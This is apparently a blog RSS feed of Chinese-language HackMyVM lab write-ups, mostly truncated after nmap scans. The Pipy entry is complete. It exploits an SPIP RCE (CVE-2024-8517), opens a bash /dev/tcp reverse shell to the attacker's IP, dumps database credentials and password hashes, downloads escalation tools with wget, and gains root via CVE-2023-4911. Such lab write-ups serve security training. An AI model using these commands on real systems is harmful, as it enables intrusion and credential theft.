如果解压成功，则输出解压后的内容；否则输出解密后的内容 if ($decompressed !== false) { echo '解密并解压后的文本: ' . $decompressed . '\n'; } else { echo '解密后的文本: ' . $decrypted_text . '\n'; } } else { echo '无效的选项\n'; } ?> ``` 加密和解密模块（解密模块是乱码，建议不用，或者自己改）。https://7r1UMPH.github.io/post/hmv_Wave.htmlThu, 20 Mar 2025 08:24:13 +0000https://7r1UMPH.github.io/post/hmv_qweasd.html# hmv_qweasd **靶机**：https://hackmyvm.eu/machines/machine.php?vm=Qweasd **难度**：黄色 **目标 IP**：192.168.205.217 **本机** IP：192.168.205.141 --- ## **1. 端口枚举及服务探测** 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.217 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 11:35 CST Nmap scan report for 192.168.205.217 Host is up (0.00040s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Jetty 10.0.18 MAC Address: 08:00:27:75:04:B0 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds ``` 扫描结果显示目标机器开放了 22 (SSH) 、 80 (HTTP)。https://7r1UMPH.github.io/post/hmv_qweasd.htmlThu, 20 Mar 2025 08:21:08 +0000https://7r1UMPH.github.io/post/hmv_publisher.html# hmv_publisher **靶机**：https://hackmyvm.eu/machines/machine.php?vm=Leet **难度**：绿色 **目标 IP**：192.168.205.211 **本机** IP：192.168.205.141 --- ### **1. 端口枚举及服务探测** 首先，使用 `nmap` 扫描目标 IP 的开放端口，命令如下： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.211 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 11:31 CST Nmap scan report for 192.168.205.211 Host is up (0.0012s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) MAC Address: 08:00:27:D4:4E:10 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds ``` 扫描结果显示目标机器开放了 22 (SSH) 和 80 (HTTP) 端口。https://7r1UMPH.github.io/post/hmv_publisher.htmlThu, 20 Mar 2025 08:20:06 +0000https://7r1UMPH.github.io/post/hmv_Principle2.html# hmv_Principle2 # 0.简介 **靶机**：[hackmyvm - Principle2](https://hackmyvm.eu/machines/machine.php?vm=Principle2) **难度**：黄色 **目标 IP**：192.168.205.247 **本机 IP**：192.168.205.141 --- # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sT --min-rate 10000 -p- -Pn 192.168.205.247 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-12 10:45 CST Nmap scan report for thetruthoftalos.hmv (192.168.205.247) Host is up (0.00075s latency). Not shown: 63482 closed tcp ports (conn-refused), 2043 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 35659/tcp open unknown 42607/tcp open unknown 43239/tcp open unknown 43401/tcp open unknown 46365/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds ``` 其中80，111，139，445，2049端口我们比较感兴趣，但是我先看smb服务，因为我怕他整幺蛾子 --- # 2.踩点 ## prot 445 ps:它这个smb服务不知道是它靶机有幺蛾子还是我攻击机有幺蛾子，我用不了smbmap，而且我用smbclient访问目录有概率失败，如果你复现失败的话，多试几次 ```bash ┌──(kali㉿kali)-[~/test] └─$ smbclient //192.168.205.247/public Password for [WORKGROUP\kali]: Try 'help' to get a list of possible commands. smb: \> ls . D 0 Tue Nov 28 19:57:45 2023 .. D 0 Sun Nov 26 00:19:40 2023 new_era.txt N 158 Sun Nov 19 20:01:00 2023 straton.txt N 718 Sun Nov 19 20:00:24 2023 loyalty.txt N 931 Sun Nov 19 20:01:07 2023 19962704 blocks of size 1024. 17182940 blocks available smb: \> get new_era.txt getting file \new_era.txt of size 158 as new_era.txt (77.1 KiloBytes/sec) (average 77.1 KiloBytes/sec) smb: \> get straton.txt getting file \straton.txt of size 718 as straton.txt (350.6 KiloBytes/sec) (average 213.9 KiloBytes/sec) smb: \> get loyalty.txt getting file \loyalty.txt of size 931 as loyalty.txt (454.6 KiloBytes/sec) (average 294.1 KiloBytes/sec) smb: \> exit ┌──(kali㉿kali)-[~/test] └─$ cat new_era.txt Yesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password. ┌──(kali㉿kali)-[~/test] └─$ cat straton.txt This fragment from Straton's On the Universe appears to have been of great significance both to the Progenitor and to the Founder. AMYNTAS: But what does this tell us about the nature of the universe, which is what we were discussing? STRATON: That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact? ┌──(kali㉿kali)-[~/test] └─$ cat loyalty.txt This text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452). What I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility. 2257686f2061726520796f752c207468656e3f22 To put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril. # new_era.txt翻译 昨天发生了重大变化，新政府，新市长。https://7r1UMPH.github.io/post/hmv_Principle2.htmlThu, 20 Mar 2025 08:19:04 +0000https://7r1UMPH.github.io/post/hmv_Pipy.html# hmv_Pipy # 0.简介 **靶机**：[hackmyvm - Pipy](https://hackmyvm.eu/machines/machine.php?vm=Pipy) **难度**：绿色 **目标 IP**：192.168.205.143 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-18 10:33 CST Nmap scan report for tiny.hmv (192.168.205.143) Host is up (0.00031s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:47:C9:FD (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds ``` 先看**80端口**，**22端口**候补 # 2.踩点  扫描有没有漏洞（不得不说，群里面的web大佬**Anjv-W.** 推荐的扫洞工具就是好用，点赞👍） ```bash ┌──(kali㉿kali)-[~/test] └─$ nuclei -u http://192.168.205.143 __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.3.8 projectdiscovery.io [INF] Current nuclei version: v3.3.8 (latest) [INF] Current nuclei-templates version: v10.1.1 (latest) [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 154 [INF] Templates loaded for current scan: 7607 [INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates [WRN] Loading 182 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] Templates clustered: 1702 (Reduced 1602 Requests) [INF] Using Interactsh Server: oast.online [CVE-2024-8517] [http] [critical] http://192.168.205.143/spip.ph%70?pag%65=spip_pass&lang=fr [waf-detect:apachegeneric] [http] [info] http://192.168.205.143 [openssh-detect] [tcp] [info] 192.168.205.143:22 ['SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4'] [ssh-password-auth] [javascript] [info] 192.168.205.143:22 [ssh-sha1-hmac-algo] [javascript] [info] 192.168.205.143:22 [ssh-server-enumeration] [javascript] [info] 192.168.205.143:22 ['SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4'] [ssh-auth-methods] [javascript] [info] 192.168.205.143:22 ['['publickey','password']'] [CVE-2023-48795] [javascript] [medium] 192.168.205.143:22 ['Vulnerable to Terrapin'] [composer-config:composer.json] [http] [info] http://192.168.205.143/composer.json [composer-config:composer.json] [http] [info] http://192.168.205.143/vendor/composer/installed.json [metatag-cms] [http] [info] http://192.168.205.143 ['SPIP 4.2.0'] [readme-md] [http] [info] http://192.168.205.143/README.md [http-missing-security-headers:permissions-policy] [http] [info] http://192.168.205.143 [http-missing-security-headers:x-frame-options] [http] [info] http://192.168.205.143 [http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.205.143 [http-missing-security-headers:referrer-policy] [http] [info] http://192.168.205.143 [http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.205.143 [http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.205.143 [http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.205.143 [http-missing-security-headers:content-security-policy] [http] [info] http://192.168.205.143 [http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.205.143 [http-missing-security-headers:clear-site-data] [http] [info] http://192.168.205.143 [http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.205.143 [apache-detect] [http] [info] http://192.168.205.143 ['Apache/2.4.52 (Ubuntu)'] [spip-detect:spip_version] [http] [info] http://192.168.205.143 ['4.2.0'] [configuration-listing] [http] [medium] http://192.168.205.143/config/ ``` 有一个[CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517)漏洞，我们利用一下  非授权远程执行更喜欢了🤩 ```bash git clone https://github.com/Chocapikk/CVE-2024-8517.git cd CVE-2024-8517 python3 -m venv env source env/bin/activate pip install -r requirements.txt ┌──(env)─(kali㉿kali)-[~/test/tmp/CVE-2024-8517] └─$ python3 exploit.py -u http://192.168.205.143 ✅ Target is vulnerable! Command Output: www-data ℹ Interactive shell started. Type `exit` to quit. $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) deactivate #退出虚拟环境命令 rm -rf env #删除虚拟环境 ``` 成功，但是我们要弹个**反弹shell**回去，因为它这个脚本的shell有限制 ```bash $ bash -c 'bash -i >& /dev/tcp/192.168.205.141/8888 0>&1' ``` # 3. 获得稳定的 Shell 获取**反向 shell** 后，通过以下命令获得稳定的**交互式** **TTY shell**： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` # 4.提权 ```bash www-data@pipy:/var/www/html$ sudo -l [sudo] password for www-data: sudo: a password is required www-data@pipy:/var/www/html$ ls -la total 156 drwxr-xr-x 11 www-data www-data 4096 Oct 4 2023 . drwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .. -rw-r--r-- 1 www-data www-data 7045 Feb 23 2023 CHANGELOG.md drwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 IMG -rw-r--r-- 1 www-data www-data 35147 Feb 23 2023 LICENSE -rw-r--r-- 1 www-data www-data 842 Feb 23 2023 README.md -rw-r--r-- 1 www-data www-data 178 Feb 23 2023 SECURITY.md -rw-r--r-- 1 www-data www-data 1761 Feb 23 2023 composer.json -rw-r--r-- 1 www-data www-data 27346 Feb 23 2023 composer.lock drwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 config drwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 ecrire -rw-r--r-- 1 www-data www-data 4307 Feb 23 2023 htaccess.txt -rw-r--r-- 1 www-data www-data 42 Feb 23 2023 index.php drwxr-xr-x 5 www-data www-data 4096 Oct 3 2023 local drwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 plugins-dist -rw-r--r-- 1 www-data www-data 3645 Feb 23 2023 plugins-dist.json drwxr-xr-x 12 www-data www-data 4096 Oct 3 2023 prive -rw-r--r-- 1 www-data www-data 973 Feb 23 2023 spip.php -rw-r--r-- 1 www-data www-data 1212 Feb 23 2023 spip.png -rw-r--r-- 1 www-data www-data 1673 Feb 23 2023 spip.svg drwxr-xr-x 10 www-data www-data 4096 Oct 3 2023 squelettes-dist drwxr-xr-x 5 www-data www-data 4096 Jan 18 02:35 tmp drwxr-xr-x 6 www-data www-data 4096 Oct 3 2023 vendor www-data@pipy:/var/www/html$ cd config/ www-data@pipy:/var/www/html/config$ ls -al total 48 drwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 . drwxr-xr-x 11 www-data www-data 4096 Oct 4 2023 .. -rw-rw-rw- 1 www-data www-data 197 Oct 3 2023 .htaccess -rw-rw-rw- 1 www-data www-data 0 Oct 3 2023 .ok -rw-rw-rw- 1 www-data www-data 109 Oct 3 2023 chmod.php -rw-rw-rw- 1 www-data www-data 163 Oct 3 2023 cles.php -rw-rw-rw- 1 www-data www-data 243 Oct 3 2023 connect.php -rw-r--r-- 1 www-data www-data 17240 Feb 23 2023 ecran_securite.php -rw-r--r-- 1 www-data www-data 83 Feb 23 2023 remove.txt www-data@pipy:/var/www/html/config$ cat connect.php <?php if (!defined('_ECRIRE_INC_VERSION')) return; defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true); $GLOBALS['spip_connect_version'] = 0.8; spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','',''); www-data@pipy:/var/www/html/config$ mysql -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 503 Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> use spip; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [spip]> show tables; +-------------------------+ | Tables_in_spip | +-------------------------+ | spip_articles | | spip_auteurs | | spip_auteurs_liens | | spip_depots | | spip_depots_plugins | | spip_documents | | spip_documents_liens | | spip_forum | | spip_groupes_mots | | spip_jobs | | spip_jobs_liens | | spip_meta | | spip_mots | | spip_mots_liens | | spip_paquets | | spip_plugins | | spip_referers | | spip_referers_articles | | spip_resultats | | spip_rubriques | | spip_syndic | | spip_syndic_articles | | spip_types_documents | | spip_urls | | spip_versions | | spip_versions_fragments | | spip_visites | | spip_visites_articles | +-------------------------+ 28 rows in set (0.000 sec) MariaDB [spip]> select * from spip_auteurs\G *************************** 1. row *************************** id_auteur: 1 nom: Angela bio: email: angela@pipy.htb nom_site: url_site: login: angela pass: 4ng3l4 low_sec: statut: 0minirezo webmestre: oui maj: 2023-10-04 17:28:39 pgp: htpass: en_ligne: 2023-10-04 13:50:34 alea_actuel: 387046876651c39a45bc836.13502903 alea_futur: 465278670651d6da4349d85.01841245 prefs: a:4:{s:7:'couleur';i:2;s:7:'display';i:2;s:18:'display_navigation';s:22:'navigation_avec_icones';s:3:'cnx';s:0:'';} cookie_oubli: NULL source: spip lang: imessage: backup_cles: 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= *************************** 2. row *************************** id_auteur: 2 nom: admin bio: email: admin@pipy.htb nom_site: url_site: login: admin pass: $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 low_sec: statut: 1comite webmestre: non maj: 2023-10-04 17:31:03 pgp: htpass: en_ligne: 2023-10-04 17:31:03 alea_actuel: 1540227024651d7e881c21a5.84797952 alea_futur: 439334464651da1526dbb90.67439545 prefs: a:4:{s:7:'couleur';i:2;s:7:'display';i:2;s:18:'display_navigation';s:22:'navigation_avec_icones';s:3:'cnx';s:0:'';} cookie_oubli: 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= source: spip lang: fr imessage: oui backup_cles: 2 rows in set (0.000 sec) ``` 切换至`angela` ```bash www-data@pipy:/var/www/html/config$ su - angela Password: angela@pipy:~$ id uid=1000(angela) gid=1000(angela) groups=1000(angela) ``` 继续提权 ```bash angela@pipy:~$ ls -la total 40 drwxr-x--- 6 angela angela 4096 Oct 17 2023 . drwxr-xr-x 3 root root 4096 Oct 4 2023 .. lrwxrwxrwx 1 angela angela 9 Oct 17 2023 .bash_history -> /dev/null -rw-r--r-- 1 angela angela 220 Jan 6 2022 .bash_logout -rw-r--r-- 1 angela angela 3771 Jan 6 2022 .bashrc drwx------ 3 angela angela 4096 Oct 5 2023 .cache drwxrwxr-x 3 angela angela 4096 Oct 3 2023 .local -rw-r--r-- 1 angela angela 807 Jan 6 2022 .profile drwx------ 3 angela angela 4096 Oct 3 2023 snap drwx------ 2 angela angela 4096 Oct 2 2023 .ssh -rw-r--r-- 1 angela angela 0 Oct 2 2023 .sudo_as_admin_successful -rw------- 1 angela angela 33 Oct 5 2023 user.txt angela@pipy:~$ cd /opt/ angela@pipy:/opt$ ls -al total 8 drwxr-xr-x 2 root root 4096 Aug 10 2023 . drwxr-xr-x 19 root root 4096 Oct 2 2023 .. angela@pipy:/opt$ cd /tmp/ angela@pipy:/tmp$ ls -al total 12 drwxrwxrwt 2 root root 4096 Jan 18 02:44 . drwxr-xr-x 19 root root 4096 Oct 2 2023 .. -rw------- 1 www-data www-data 19 Jan 18 02:44 phpMHrr6q angela@pipy:/tmp$ cd /mnt/ angela@pipy:/mnt$ ls -la total 8 drwxr-xr-x 2 root root 4096 Aug 10 2023 . drwxr-xr-x 19 root root 4096 Oct 2 2023 .. angela@pipy:/mnt$ find / -perm -4000 -type f 2>/dev/null /usr/libexec/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/umount /usr/bin/mount /usr/bin/chfn /usr/bin/fusermount3 /usr/bin/newgrp /usr/bin/chsh /usr/bin/sudo /usr/bin/su /usr/bin/pkexec /snap/snapd/23545/usr/lib/snapd/snap-confine /snap/snapd/20092/usr/lib/snapd/snap-confine /snap/core20/2434/usr/bin/chfn /snap/core20/2434/usr/bin/chsh /snap/core20/2434/usr/bin/gpasswd /snap/core20/2434/usr/bin/mount /snap/core20/2434/usr/bin/newgrp /snap/core20/2434/usr/bin/passwd /snap/core20/2434/usr/bin/su /snap/core20/2434/usr/bin/sudo /snap/core20/2434/usr/bin/umount /snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2434/usr/lib/openssh/ssh-keysign /snap/core20/2015/usr/bin/chfn /snap/core20/2015/usr/bin/chsh /snap/core20/2015/usr/bin/gpasswd /snap/core20/2015/usr/bin/mount /snap/core20/2015/usr/bin/newgrp /snap/core20/2015/usr/bin/passwd /snap/core20/2015/usr/bin/su /snap/core20/2015/usr/bin/sudo /snap/core20/2015/usr/bin/umount /snap/core20/2015/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2015/usr/lib/openssh/ssh-keysign /snap/core/17200/bin/mount /snap/core/17200/bin/ping /snap/core/17200/bin/ping6 /snap/core/17200/bin/su /snap/core/17200/bin/umount /snap/core/17200/usr/bin/chfn /snap/core/17200/usr/bin/chsh /snap/core/17200/usr/bin/gpasswd /snap/core/17200/usr/bin/newgrp /snap/core/17200/usr/bin/passwd /snap/core/17200/usr/bin/sudo /snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/17200/usr/lib/openssh/ssh-keysign /snap/core/17200/usr/lib/snapd/snap-confine /snap/core/17200/usr/sbin/pppd /snap/core/16202/bin/mount /snap/core/16202/bin/ping /snap/core/16202/bin/ping6 /snap/core/16202/bin/su /snap/core/16202/bin/umount /snap/core/16202/usr/bin/chfn /snap/core/16202/usr/bin/chsh /snap/core/16202/usr/bin/gpasswd /snap/core/16202/usr/bin/newgrp /snap/core/16202/usr/bin/passwd /snap/core/16202/usr/bin/sudo /snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/16202/usr/lib/openssh/ssh-keysign /snap/core/16202/usr/lib/snapd/snap-confine /snap/core/16202/usr/sbin/pppd angela@pipy:/mnt$ /sbin/getcap -r / 2>/dev/null /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep /usr/bin/mtr-packet cap_net_raw=ep /usr/bin/ping cap_net_raw=ep /snap/core20/2434/usr/bin/ping cap_net_raw=ep /snap/core20/2015/usr/bin/ping cap_net_raw=ep angela@pipy:/mnt$ ss -tuln | grep tcp tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 1024 127.0.0.1:4226 0.0.0.0:* tcp LISTEN 0 511 *:80 *:* tcp LISTEN 0 128 [::]:22 [::]:* angela@pipy:/mnt$ nc nc nc.openbsd angela@pipy:/mnt$ nc 127.0.0.1 4226 a hello root angela@pipy:/mnt$ ls angela@pipy:/mnt$ nc 127.0.0.1 4226 root admin ``` 什么都没找到,还没定时任务，不会是**内核提权**吧，尝试一下可不可以使用自动化工具提权 ```bash angela@pipy:/mnt$ cd /tmp/ angela@pipy:/tmp$ wget 192.168.205.141/traitor-386 --2025-01-18 02:52:07-- http://192.168.205.141/traitor-386 Connecting to 192.168.205.141:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8475976 (8.1M) [application/octet-stream] Saving to: ‘traitor-386’ traitor-386 0%[ traitor-386 100%[========================================================================================================================================>] 8.08M --.-KB/s in 0.03s 2025-01-18 02:52:07 (282 MB/s) - ‘traitor-386’ saved [8475976/8475976] angela@pipy:/tmp$ chmod +x traitor-386 angela@pipy:/tmp$ ./traitor-386 -a ▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█ ░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14 https://github.com/liamg/traitor [+] Assessing machine state... [+] Checking for opportunities... [+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable! [+][kernel:CVE-2022-0847] Opportunity found, trying to exploit it... [+][kernel:CVE-2022-0847] Attempting to set root password... [+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read... [+][kernel:CVE-2022-0847] Creating pipe... [+][kernel:CVE-2022-0847] Determining pipe size... [+][kernel:CVE-2022-0847] Pipe size is 65536. [+][kernel:CVE-2022-0847] Filling pipe... [+][kernel:CVE-2022-0847] Draining pipe... [+][kernel:CVE-2022-0847] Pipe drained. [+][kernel:CVE-2022-0847] Splicing data... [+][kernel:CVE-2022-0847] Writing to dirty pipe... [+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful! [+][kernel:CVE-2022-0847] Starting shell... [+][kernel:CVE-2022-0847] Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored. [+][kernel:CVE-2022-0847] Setting up tty... [+][kernel:CVE-2022-0847] Attempting authentication as root... [+][kernel:CVE-2022-0847] Restoring contents of /etc/passwd... [+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read... [+][kernel:CVE-2022-0847] Creating pipe... [+][kernel:CVE-2022-0847] Determining pipe size... [+][kernel:CVE-2022-0847] Pipe size is 65536. [+][kernel:CVE-2022-0847] Filling pipe... [+][kernel:CVE-2022-0847] Draining pipe... [+][kernel:CVE-2022-0847] Pipe drained. [+][kernel:CVE-2022-0847] Splicing data... [+][kernel:CVE-2022-0847] Writing to dirty pipe... [+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful! [+][error] Exploit failed: invalid password [+] Continuing to look for opportunities [+] Nothing found to exploit. ``` 不可以，那还是我们自己找吧 ```bash angela@pipy:/tmp$ uname -a Linux pipy 5.15.0-84-generic #93-Ubuntu SMP Tue Sep 5 17:16:10 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux angela@pipy:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.3 LTS Release: 22.04 Codename: jammy ``` 找一下，发现**[CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911)**可以，但是要用特定的脚本，有些脚本不行 ```bash #kali ┌──(kali㉿kali)-[~/test/tmp] └─$ wget https://github.com/leesh3288/CVE-2023-4911/archive/refs/heads/main.zip ┌──(kali㉿kali)-[~/test/tmp] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... #靶机 angela@pipy:/tmp$ wget 192.168.205.141/main.zip --2025-01-18 03:06:17-- http://192.168.205.141/main.zip Connecting to 192.168.205.141:80... failed: Connection refused. angela@pipy:/tmp$ wget 192.168.205.141/main.zip --2025-01-18 03:06:25-- http://192.168.205.141/main.zip Connecting to 192.168.205.141:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3044 (3.0K) [application/octet-stream] Saving to: ‘main.zip’ main.zip 0%[ main.zip.1 100%[========================================================================================================================================>] 2.97K --.-KB/s in 0s 2025-01-18 03:06:25 (21.8 MB/s) - ‘main.zip’ saved [3044/3044] angela@pipy:/tmp$ unzip main.zip Archive: main.zip acf0d3a8bd4c437475a7c4c83f5790e53e8103cb creating: CVE-2023-4911-main/ inflating: CVE-2023-4911-main/Makefile inflating: CVE-2023-4911-main/README.md inflating: CVE-2023-4911-main/exp.c inflating: CVE-2023-4911-main/gen_libc.py angela@pipy:/tmp$ cd CVE-2023-4911-main/ angela@pipy:/tmp/CVE-2023-4911-main$ make gcc -o exp exp.c python3 gen_libc.py [*] '/lib/x86_64-linux-gnu/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ./exp try 100 # id uid=0(root) gid=0(root) groups=0(root),1000(angela) ```。https://7r1UMPH.github.io/post/hmv_Pipy.htmlThu, 20 Mar 2025 08:18:02 +0000https://7r1UMPH.github.io/post/hmv_oliva.html# hmv_oliva # 0. 简介 **靶机**：[hackmyvm - oliva](https://hackmyvm.eu/machines/machine.php?vm=oliva) **难度**：绿色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1. 扫描 使用 `nmap` 扫描： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 08:43 CST Nmap scan report for 192.168.205.138 Host is up (0.00029s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:84:83:23 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds ``` 扫描结果显示目标开启了 **SSH** (22/tcp) 和 **HTTP** (80/tcp) 服务。https://7r1UMPH.github.io/post/hmv_oliva.htmlThu, 20 Mar 2025 08:17:00 +0000https://7r1UMPH.github.io/post/hmv_Minimal.html# hmv_Minimal # 0.简介 **靶机**：[hackmyvm - Minimal](https://hackmyvm.eu/machines/machine.php?vm=Minimal) **难度**：黄色 **目标 IP**：192.168.205.135 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.135 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-14 14:58 CST Nmap scan report for 192.168.205.135 Host is up (0.00054s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:0D:67:64 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.62 seconds ``` 先看**80端口**，**22端口**候补 # 2.踩点  （页面挺简洁）发现一个**登录网页(login.php)** ，测试了`弱密码、sql注入、万能密码`均无果，没有现成的，我们自己注册一个  注册完之后，可以把一些商品加入购物车  当你准备买单的时候，点击`Buy items`会发现，网址出现了变化。https://7r1UMPH.github.io/post/hmv_Minimal.htmlThu, 20 Mar 2025 08:15:58 +0000https://7r1UMPH.github.io/post/hmv_logan2.html# hmv_logan2 # 0.简介 **靶机**：[hackmyvm - logan2](https://hackmyvm.eu/machines/machine.php?vm=logan2) 